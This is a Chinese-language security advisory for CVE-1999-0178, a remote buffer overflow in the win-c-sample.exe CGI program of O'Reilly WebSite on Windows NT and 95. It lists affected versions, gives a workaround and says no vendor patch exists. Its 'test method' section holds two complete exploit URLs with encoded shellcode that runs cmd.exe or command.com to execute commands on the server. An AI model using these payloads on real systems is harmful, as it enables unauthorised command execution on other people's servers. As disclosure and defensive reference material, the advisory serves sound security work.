发布日期：1997-01-06
更新日期：1997-01-06

受影响系统：

OReilly Software WebSite 1.0
    - Microsoft Windows NT 4.0
    - Microsoft Windows 95
OReilly Software WebSite 1.1
    - Microsoft Windows NT 4.0
    - Microsoft Windows 95
OReilly Software WebSite Professional 1.1b
    - Microsoft Windows NT
    - Microsoft Windows 95
OReilly Software WebSite Professional 1.1c
    - Microsoft Windows NT
    - Microsoft Windows 95
OReilly Software WebSite Professional 2.0
    - Microsoft Windows NT
    - Microsoft Windows 95

描述：

---

BUGTRAQ  ID: 2078
CVE(CAN) ID: CVE-1999-0178

O'Reilly WebSite (Pro)是一个Windows 平台下的Web服务器软件。

低版本的Website的一个例程存在缓冲溢出问题，远程攻击者可能利用此漏洞以Web进程的权限执行任意指令。

1.1e版的Website for NT Web服务器在/cgi-shl/目录下包含了win-c-sample.exe程序。此程序有严重的缓冲区溢出漏洞，允许攻击者通过溢出攻击执行任意指令。由于WebSite通常运行在较高权限的帐号下，所以该漏洞导致的问题较严重。


<*来源：Solar Designer
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Solar Designer （）提供了如下测试方法：

Windows NT :
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\x1.htm

Windows 95:
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%03%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocsx1.htm

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 暂时把win-c-sample.exe移出WEB目录。

厂商补丁：

OReilly Software
----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.oreilly.com

浏览次数：33855
严重程度：0（网友投票）